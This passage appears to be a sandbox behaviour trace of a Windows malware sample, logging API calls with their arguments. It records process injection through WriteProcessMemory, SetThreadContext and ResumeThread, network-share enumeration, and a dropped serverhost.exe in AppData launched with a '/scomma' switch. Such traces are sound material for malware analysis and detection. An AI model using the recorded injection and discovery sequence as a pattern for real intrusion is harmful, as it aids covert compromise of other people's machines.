[71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7ffdd000, Edx=0x0, Ecx=0x0, Eax=0xc41d90, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0085.444] IsWow64Process (in: hProcess=0x3d4, Wow64Process=0x242f5b4 | out: Wow64Process=0x242f5b4) returned 1 [0085.444] WriteProcessMemory (in: hProcess=0x3d4, lpBaseAddress=0x400000, lpBuffer=0x2170000*, nSize=0x19000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2170000*, lpNumberOfBytesWritten=0x0) returned 1 [0085.447] WriteProcessMemory (in: hProcess=0x3d4, lpBaseAddress=0x7ffdd008, lpBuffer=0x242f5b8*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x242f5b8*, lpNumberOfBytesWritten=0x0) returned 1 [0085.447] SetThreadContext (hThread=0x3d8, lpContext=0x242f2c8*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7ffdd000, Edx=0x0, Ecx=0x0, Eax=0x406c63, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0085.447] ResumeThread (hThread=0x3d8) returned 0x1 [0085.447] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0xffffffff) returned 0x0 [0087.390] CloseHandle (hObject=0x3d4) returned 1 [0087.390] CloseHandle (hObject=0x3d8) returned 1 [0087.390] CloseHandle (hObject=0x0) returned 0 [0087.390] VirtualFree (lpAddress=0x2170000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.391] GetTickCount () returned 0x1d4db [0087.493] GetTickCount () returned 0x1d548 [0087.493] GetTickCount () returned 0x1d548 [0087.493] GetTickCount () returned 0x1d548 [0087.524] GetTickCount () returned 0x1d567 [0087.680] GetTickCount () returned 0x1d603 [0088.444] GetTickCount () returned 0x1d8ff [0088.444] GetTickCount () returned 0x1d8ff [0088.444] GetTickCount () returned 0x1d8ff [0088.522] GetTickCount () returned 0x1d94d Thread: id = 80 os_tid = 0xc34 Thread: id = 81 os_tid = 0xc38 Thread: id = 82 os_tid = 0xc3c Thread: id = 83 os_tid = 0xc40 [0083.359] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x764f0000 [0083.360] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x755b0000 [0083.360] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x758a0000 [0083.360] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x76f00000 [0083.360] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x74af0000 [0083.361] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x77040000 [0083.361] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x74180000 [0083.361] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x394 [0083.361] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x1d14218 | out: pszPath="C:\\ProgramData") returned 0x0 [0083.362] GetTempFileNameW (in: lpPathName="C:\\ProgramData", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x1d14218 | out: lpTempFileName="C:\\ProgramData\\C570.tmp" (normalized: "c:\\programdata\\c570.tmp")) returned 0xc570 [0083.362] DeleteFileW (lpFileName="C:\\ProgramData\\C570.tmp" (normalized: "c:\\programdata\\c570.tmp")) returned 1 [0083.362] GetTickCount () returned 0x1c570 [0083.362] CreateTimerQueueTimer (in: phNewTimer=0x271fa70, TimerQueue=0x0, Callback=0x1cf9200, Parameter=0x0, DueTime=0x3e8, Period=0x3e8, Flags=0x10 | out: phNewTimer=0x271fa70*=0x4a8c98) returned 1 [0083.362] WaitForSingleObject (hHandle=0x394, dwMilliseconds=0xffffffff) Thread: id = 84 os_tid = 0xc44 [0083.363] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x764f0000 [0083.363] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x755b0000 [0083.363] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x758a0000 [0083.363] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x76f00000 [0083.364] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x74af0000 [0083.364] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x77040000 [0083.364] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x74180000 [0083.364] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x39c [0083.364] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x1d91a18 | out: pszPath="C:\\ProgramData") returned 0x0 [0083.364] GetTempFileNameW (in: lpPathName="C:\\ProgramData", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x1d91a18 | out: lpTempFileName="C:\\ProgramData\\C571.tmp" (normalized: "c:\\programdata\\c571.tmp")) returned 0xc571 [0083.365] DeleteFileW (lpFileName="C:\\ProgramData\\C571.tmp" (normalized: "c:\\programdata\\c571.tmp")) returned 1 [0083.365] GetTickCount () returned 0x1c570 [0083.365] CreateTimerQueueTimer (in: phNewTimer=0x2bffe98, TimerQueue=0x0, Callback=0x1d39200, Parameter=0x0, DueTime=0x3e8, Period=0x3e8, Flags=0x10 | out: phNewTimer=0x2bffe98*=0x4a8cd8) returned 1 [0083.365] WaitForSingleObject (hHandle=0x39c, dwMilliseconds=0xffffffff) Thread: id = 85 os_tid = 0xc48 [0083.365] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x764f0000 [0083.365] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x755b0000 [0083.366] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x758a0000 [0083.366] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x76f00000 [0083.366] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x74af0000 [0083.366] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x77040000 [0083.366] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x74180000 [0083.366] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x398 [0083.367] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x1fcea18 | out: pszPath="C:\\ProgramData") returned 0x0 [0083.367] GetTempFileNameW (in: lpPathName="C:\\ProgramData", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x1fcea18 | out: lpTempFileName="C:\\ProgramData\\C572.tmp" (normalized: "c:\\programdata\\c572.tmp")) returned 0xc572 [0083.367] DeleteFileW (lpFileName="C:\\ProgramData\\C572.tmp" (normalized: "c:\\programdata\\c572.tmp")) returned 1 [0083.367] GetTickCount () returned 0x1c570 [0083.367] CreateTimerQueueTimer (in: phNewTimer=0x2ddfbf0, TimerQueue=0x0, Callback=0x1fb93b0, Parameter=0x0, DueTime=0x3e8, Period=0x3e8, Flags=0x10 | out: phNewTimer=0x2ddfbf0*=0x4a8d18) returned 1 [0083.367] WaitForSingleObject (hHandle=0x398, dwMilliseconds=0xffffffff) Thread: id = 86 os_tid = 0xc4c [0083.368] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x764f0000 [0083.368] LoadLibraryW (lpLibFileName="mpr.dll") returned 0x71dd0000 [0083.370] LoadLibraryW (lpLibFileName="netapi32.dll") returned 0x73e90000 [0083.440] LoadLibraryW (lpLibFileName="SAMCLI.DLL") returned 0x734e0000 [0083.450] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x74af0000 [0083.451] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x74180000 [0083.451] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c8 [0083.451] GetTickCount () returned 0x1c5be [0083.451] CreateTimerQueueTimer (in: phNewTimer=0x2f9fe68, TimerQueue=0x0, Callback=0x1cd44f0, Parameter=0x0, DueTime=0x3e8, Period=0x3e8, Flags=0x10 | out: phNewTimer=0x2f9fe68*=0x4a8d98) returned 1 [0083.451] WaitForSingleObject (hHandle=0x3c8, dwMilliseconds=0xffffffff) Thread: id = 89 os_tid = 0xc60 [0085.511] GetTickCount () returned 0x1cdd9 [0085.512] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cd52a8, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0085.512] GetComputerNameW (in: lpBuffer=0x1cd522c, nSize=0x311f678 | out: lpBuffer="F71GWAT", nSize=0x311f678) returned 1 [0085.520] WTSGetActiveConsoleSessionId () returned 0x1 [0085.520] WTSQueryUserToken (SessionId=0x1, phToken=0x311f678*=0x2014048) returned 0 [0085.520] ImpersonateLoggedOnUser (hToken=0x0) returned 0 [0085.520] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x311efb0 | out: lphEnum=0x311efb0*=0x4a8dd8) returned 0x0 [0086.027] WaitForSingleObject (hHandle=0x3c8, dwMilliseconds=0x0) returned 0x102 [0086.027] WNetEnumResourceW (in: hEnum=0x4a8dd8, lpcCount=0x311efa4, lpBuffer=0x2039a38, lpBufferSize=0x311efc0 | out: lpcCount=0x311efa4, lpBuffer=0x2039a38, lpBufferSize=0x311efc0) returned 0x0 [0086.027] WaitForSingleObject (hHandle=0x3c8, dwMilliseconds=0x0) returned 0x102 [0086.027] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2039a38, lphEnum=0x311e8d0 | out: lphEnum=0x311e8d0*=0x4c37d0) returned 0x0 [0086.053] WaitForSingleObject (hHandle=0x3c8, dwMilliseconds=0x0) returned 0x102 [0086.053] WNetEnumResourceW (in: hEnum=0x4c37d0, lpcCount=0x311e8c4, lpBuffer=0x2049a40, lpBufferSize=0x311e8e0 | out: lpcCount=0x311e8c4, lpBuffer=0x2049a40, lpBufferSize=0x311e8e0) returned 0x103 [0086.053] WNetCloseEnum (hEnum=0x4c37d0) returned 0x0 [0086.053] WaitForSingleObject (hHandle=0x3c8, dwMilliseconds=0x0) returned 0x102 [0086.053] WNetOpenEnumW (dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2039a58, lphEnum=0x311e8d0) Thread: id = 91 os_tid = 0xc70 [0085.662] GetTickCount () returned 0x1ce65 Thread: id = 92 os_tid = 0xc74 [0086.393] GetTickCount () returned 0x1d142 [0086.393] GetTickCount () returned 0x1d142 [0086.393] GetTickCount () returned 0x1d142 [0086.449] GetTickCount () returned 0x1d181 [0086.587] GetTickCount () returned 0x1d1fd Process: id = "12" image_name = "serverhost.exe" filename = "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe" page_root = "0x7eef72e0" os_pid = "0xc50" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xc18" cmd_line = "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" /scomma \"C:\\ProgramData\\C570.tmp\"" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = 